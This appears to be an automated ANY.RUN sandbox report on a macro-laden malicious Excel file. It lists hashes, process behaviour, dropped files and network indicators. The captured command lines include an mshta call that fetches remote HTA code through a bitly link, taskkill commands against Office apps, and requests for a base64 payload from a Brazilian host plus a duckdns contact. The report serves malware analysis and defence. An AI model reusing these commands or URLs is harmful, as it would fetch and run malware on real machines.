analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

a44bcc5459f5d3b6a115bc50a7403fd85721acaecf0a4ac9b4e025df4d796845.xls

Full analysis: https://app.any.run/tasks/8382ae5e-81eb-40b6-9fe1-3ebd3d997558
Verdict: Malicious activity
Analysis date: April 24, 2019, 01:46:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Mon Apr 22 19:28:18 2019, Security: 0
MD5:

DE611846537F549B214973A367659F4E

SHA1:

CFB375118D1728E1184F8A02A6266C8637B518F4

SHA256:

A44BCC5459F5D3B6A115BC50A7403FD85721ACAECF0A4AC9B4E025DF4D796845

SSDEEP:

768:v2K1Tgbyw3sz2jyngov9rjXjBCKTUAuulFFVgiqW3E:OK1Tgbyw3sz2jyngov9rjXjBCKoAuul8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1480)
      • cmd.exe (PID: 1412)
      • cmd.exe (PID: 3780)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 2208)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2208)
  • SUSPICIOUS

    • Creates files in the user directory

      • mshta.exe (PID: 936)
      • powershell.exe (PID: 868)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 936)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1412)
      • cmd.exe (PID: 1480)
    • Application launched itself

      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1412)
      • cmd.exe (PID: 1480)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 2592)
      • cmd.exe (PID: 2648)
    • Executes PowerShell scripts

      • forfiles.exe (PID: 3464)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 936)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2208)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: -
LastModifiedBy: -
Software: Microsoft Excel
CreateDate: 2015:06:05 18:19:34
ModifyDate: 2019:04:22 18:28:18
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: Plan1
HeadingPairs:
  • Planilhas
  • 1
CompObjUserTypeLen: 34
CompObjUserType: Planilha do Microsoft Excel 2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
53
Monitored processes
17
Malicious processes
2
Suspicious processes
3

Behavior graph

Click at the process to see the details
start excel.exe no specs mshta.exe cmd.exe no specs ping.exe no specs cmd.exe no specs taskkill.exe no specs cmd.exe no specs ping.exe no specs cmd.exe no specs taskkill.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs cmd.exe no specs forfiles.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2208"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
936mshta http://www.bitly.com/MsgUpSentVinC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3896"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 2 > nul & cmd /c taskkill /f /im WINWORD.EXE & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1796ping 127.0.0.1 -n 2 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2592cmd /c taskkill /f /im WINWORD.EXE C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3984taskkill /f /im WINWORD.EXE C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1412"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 3 > nul & cmd /c taskkill /f /im EXCEL.EXE & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3128ping 127.0.0.1 -n 3 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2648cmd /c taskkill /f /im EXCEL.EXE C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1668taskkill /f /im EXCEL.EXE C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
901
Read events
802
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR5CB2.tmp.cvr
MD5:
SHA256:
2208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF44C7611FF97DB07E.TMP
MD5:
SHA256:
868powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8WEB9QOMJQJ25DZR3H8Y.temp
MD5:
SHA256:
936mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\comando[1].htmhtml
MD5:C88C580470820DF5DFB725E4CF6950A6
SHA256:7FCABA43D352FF1CC4AF2E097F73EE86844A6CF175E7D9C0813DEFCD1FA1A207
2208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFBFC95DE18448AE21.TMPbinary
MD5:B112A595FD6A76F30355F1A247E3558F
SHA256:232F01299AF9F2B25A5FB57061FEC3E2391EB5F36E9DFB3775595AA3D7F44D2D
868powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf2ac0.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
936mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txttext
MD5:36FBCEFA0C62A135A6A9DBEB88767981
SHA256:F9A98D9C45D7C54E64096B2E2E040EE4B7FD030CD42B6572D928C53A85A04624
868powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
936
mshta.exe
GET
177.12.161.211:80
http://gabrielfaller.com.br/image/comando.html
BR
unknown
936
mshta.exe
GET
301
67.199.248.15:80
http://bitly.com/MsgUpSentVin
US
html
133 b
shared
868
powershell.exe
GET
200
177.12.161.211:80
http://gabrielfaller.com.br/image/base.mp3
BR
text
544 Kb
unknown
936
mshta.exe
GET
301
67.199.248.15:80
http://www.bitly.com/MsgUpSentVin
US
html
178 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
936
mshta.exe
177.12.161.211:80
gabrielfaller.com.br
IPV6 Internet Ltda
BR
unknown
152.245.202.67:7000
olhomagicocdt.duckdns.org
TELEFÔNICA BRASIL S.A
BR
unknown
868
powershell.exe
177.12.161.211:80
gabrielfaller.com.br
IPV6 Internet Ltda
BR
unknown
936
mshta.exe
67.199.248.15:80
www.bitly.com
Bitly Inc
US
shared

DNS requests

Domain
IP
Reputation
www.bitly.com
  • 67.199.248.15
  • 67.199.248.14
shared
gabrielfaller.com.br
  • 177.12.161.211
unknown
olhomagicocdt.duckdns.org
  • 152.245.202.67
malicious

Threats

PID
Process
Class
Message
936
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
936
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
868
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable base64 Payload
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
No debug info